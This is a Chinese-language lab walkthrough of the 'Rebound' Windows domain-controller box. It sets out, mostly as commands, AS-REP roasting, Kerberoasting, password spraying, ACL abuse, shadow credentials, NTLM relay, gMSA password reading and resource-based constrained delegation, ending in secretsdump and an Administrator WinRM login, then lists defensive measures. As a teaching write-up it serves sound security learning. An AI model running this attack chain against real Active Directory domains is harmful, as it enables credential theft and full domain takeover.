Rebound靶机渗透实战教学文档<\/h1>

一、靶机概述<\/h2>

名称<\/strong>: Rebound (Insane)<\/li>
作者<\/strong>: Geiseric<\/li>
发布日期<\/strong>: 2023\/09\/09<\/li>
难度<\/strong>: 疯狂(Insane)<\/li>
环境<\/strong>: Windows域控环境<\/li>

特点<\/strong>:

结合密码喷洒攻击<\/li>
影子凭据技术<\/li>
高级委派攻击(RBCD)<\/li>
启用了LDAP签名要求和通道绑定等加固手段<\/li> <\/ul> <\/li> <\/ul>
二、信息收集<\/h2>
2.1 端口扫描结果<\/h3>
TCP开放端口<\/strong>:<\/p>

53 (DNS服务)<\/li>
88 (Windows Kerberos服务)<\/li>
139 (NetBIOS SMB服务)<\/li>
445 (SMB服务)<\/li>
389 (LDAP)<\/li>
636 (LDAPS)<\/li>
3268\/3269 (LDAP全局目录)<\/li>
5985 (WinRM)<\/li> <\/ul>
UDP开放端口<\/strong>:<\/p>

123 (NTP)<\/li>
137\/138 (NetBIOS)<\/li> <\/ul>
2.2 域名解析<\/h3>
将扫描发现的域名添加到hosts文件:<\/p>
10.129.129.114 rebound.htb DC01.rebound.htb <\/code><\/pre> 2.3 时间同步<\/h3> Kerberos认证对时间敏感(容忍±5分钟)，建议使用NTP同步:<\/p> ntpdate -u 10.129.129.114 <\/span><\/span><\/code><\/pre>三、初始攻击路径<\/h2> 3.1 SMB枚举<\/h3> 检查匿名访问<\/strong>:<\/li> <\/ol> smbclient -L \/\/10.129.129.114 -N <\/span><\/span><\/code><\/pre>发现不支持纯匿名访问，但可传入任意用户名访问<\/p> 可读共享<\/strong>:<\/li> <\/ol> IPC$<\/li> Shared (空文件夹)<\/li> <\/ul> RID枚举<\/strong>:<\/li> <\/ol> ridenum.py 10.129.129.114 40000<\/span> users <\/span><\/span><\/code><\/pre>获取到一批用户名，保存为users文件<\/p> 3.2 AS-REP Roasting攻击<\/h3> 查找不需要预身份验证的用户:<\/p> GetNPUsers.py rebound.htb\/ -no-pass -usersfile users -format hashcat -dc-ip 10.129.129.114 <\/span><\/span><\/code><\/pre>发现用户jjones返回了KRB5 ASREP哈希<\/p> 尝试破解(未成功):<\/p> hashcat -m 18200<\/span> hash.txt rockyou.txt -r \/usr\/share\/hashcat\/rules\/InsidePro-PasswordsPro.rule --potfile-disable -O -w 3<\/span> <\/span><\/span><\/code><\/pre>3.3 新型Kerberos Roasting攻击<\/h3> 参考Semperis文章中的新技术:<\/p> GetUserSPNs.py -no-pac -dc-ip 10.129.129.114 -usersfile users rebound.htb\/ <\/span><\/span><\/code><\/pre>成功获取:<\/p> krbgt (AES128-HMAC-SHA1)<\/li> ldap_monitor (RC4-HMAC)<\/li> <\/ul> 破解ldap_monitor的TGS哈希:<\/p> hashcat -m 13100<\/span> hash.txt rockyou.txt <\/span><\/span><\/code><\/pre>成功获取密码<\/p> 四、权限提升路径<\/h2> 4.1 密码喷洒攻击<\/h3> 使用ldap_monitor的密码对用户列表进行喷洒:<\/p> crackmapexec smb 10.129.129.114 -u users -p 'Password123'<\/span> <\/span><\/span><\/code><\/pre>发现用户oorend使用相同密码<\/p> 4.2 LDAP枚举<\/h3> 使用PowerView枚举<\/strong>:<\/li> <\/ol> Get-DomainUser -Identity oorend | select * <\/span><\/span>Get-DomainObjectAcl -Identity "OU=Service Users"<\/span> | ? {$_.SecurityIdentifier -match<\/span> "S-1-5-21-*"<\/span>} <\/span><\/span><\/code><\/pre> 发现攻击链<\/strong>:<\/li> <\/ol> oorend → AddSelf到ServiceMgnt组<\/li> ServiceMgnt组 → 完全控制OU=Service Users<\/li> OU=Service Users → 包含winrm_svc用户<\/li> <\/ul> 执行操作<\/strong>:<\/li> <\/ol> Add-DomainGroupMember -Identity ServiceMgnt -Members oorend <\/span><\/span>Add-DomainObjectAcl -TargetIdentity "OU=Service Users"<\/span> -PrincipalIdentity oorend -Rights All <\/span><\/span><\/code><\/pre>4.3 获取winrm_svc访问权限<\/h3> 方法1: 修改密码<\/strong><\/p> Set-DomainUserPassword -Identity winrm_svc -AccountPassword (ConvertTo-SecureString 'NewPass123!'<\/span> -AsPlainText -Force) <\/span><\/span><\/code><\/pre>方法2: 影子凭据技术(更隐蔽)<\/strong><\/p> certipy shadow auto -u oorend@rebound.htb -p 'Password123'<\/span> -account winrm_svc -target dc01.rebound.htb -dc-ip 10.129.129.114 <\/span><\/span><\/code><\/pre>获取NT哈希后通过WinRM登录<\/p> 五、域管理员提权<\/h2> 5.1 信息枚举<\/h3> 发现活跃用户tbrady<\/strong>:<\/li> <\/ol> Get-NetSession -ComputerName dc01.rebound.htb <\/span><\/span><\/code><\/pre> 枚举gMSA账号<\/strong>:<\/li> <\/ol> Get-ADServiceAccount -Filter * | select Name <\/span><\/span><\/code><\/pre>发现delegator$账号<\/p> 检查ACL<\/strong>:<\/li> <\/ol> Get-DomainObjectAcl -Identity delegator$ | ? {$_.SecurityIdentifier -eq<\/span> "S-1-1-0"<\/span>} <\/span><\/span><\/code><\/pre>发现Everyone组可读取delegator$的msDS-ManagedPassword属性<\/p> 5.2 NTLM中继攻击<\/h3> 使用KrbRelay捕获tbrady的NTLM哈希:<\/p> KrbRelay.exe -clsid {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} -session 1 <\/span><\/span><\/code><\/pre>破解获取tbrady密码<\/p> 5.3 获取delegator$凭据<\/h3> 使用tbrady票据获取gMSA密码:<\/p> certipy auth -u tbrady@rebound.htb -p 'Password123'<\/span> -dc-ip 10.129.129.114 --gmsa delegator$ <\/span><\/span><\/code><\/pre>5.4 基于资源的约束委派攻击<\/h3> 获取delegator$的TGT<\/strong>:<\/li> <\/ol> getTGT.py rebound.htb\/delegator$ -hashes :<nt_hash> <\/span><\/span>export KRB5CCNAME=<\/span>\/path\/to\/delegator$.ccache <\/span><\/span><\/code><\/pre> 执行RBCD攻击<\/strong>:<\/li> <\/ol> rbcd.py -delegate-to dc01$ -delegate-from ldap_monitor -dc-ip 10.129.129.114 -action write rebound.htb\/delegator$ <\/span><\/span><\/code><\/pre> 获取DC01机器账号票据<\/strong>:<\/li> <\/ol> getST.py -spn http\/dc01.rebound.htb -impersonate dc01$ -dc-ip 10.129.129.114 rebound.htb\/ldap_monitor -additional-ticket \/path\/to\/st1.ccache <\/span><\/span>export KRB5CCNAME=<\/span>\/path\/to\/dc01$.ccache <\/span><\/span><\/code><\/pre> Dump域管理员哈希<\/strong>:<\/li> <\/ol> secretsdump.py -k -no-pass dc01.rebound.htb <\/span><\/span><\/code><\/pre> 通过WinRM获取域控<\/strong>:<\/li> <\/ol> evil-winrm -i dc01.rebound.htb -u Administrator -H <ntlm_hash> <\/span><\/span><\/code><\/pre>六、关键技术总结<\/h2> Kerberos攻击技术<\/strong>:<\/p> AS-REP Roasting<\/li> Kerberos Roasting<\/li> 新型Kerberos攻击(无需预认证用户请求服务票据)<\/li> <\/ul> <\/li> 权限提升技术<\/strong>:<\/p> ACL滥用(AddSelf权限)<\/li> 影子凭据技术<\/li> 基于资源的约束委派(RBCD)<\/li> <\/ul> <\/li> 信息收集工具<\/strong>:<\/p> PowerView<\/li> BloodHound<\/li> NetExec<\/li> <\/ul> <\/li> 攻击工具链<\/strong>:<\/p> Impacket套件<\/li> Certipy<\/li> KrbRelay<\/li> RunasCs<\/li> <\/ul> <\/li> <\/ol> 七、防御建议<\/h2> 加固Kerberos<\/strong>:<\/p> 禁用RC4加密<\/li> 限制不需要预认证的账户<\/li> 监控异常票据请求<\/li> <\/ul> <\/li> 权限管理<\/strong>:<\/p> 定期审计ACL<\/li> 限制Self权限<\/li> 严格控制gMSA账号权限<\/li> <\/ul> <\/li> 监控措施<\/strong>:<\/p> 监控异常LDAP查询<\/li> 检测NTLM中继尝试<\/li> 记录敏感操作(如密码重置)<\/li> <\/ul> <\/li> 架构设计<\/strong>:<\/p> 启用LDAP签名和通道绑定<\/li> 限制委派配置<\/li> 分离管理账户和普通账户<\/li> <\/ul> <\/li> <\/ol>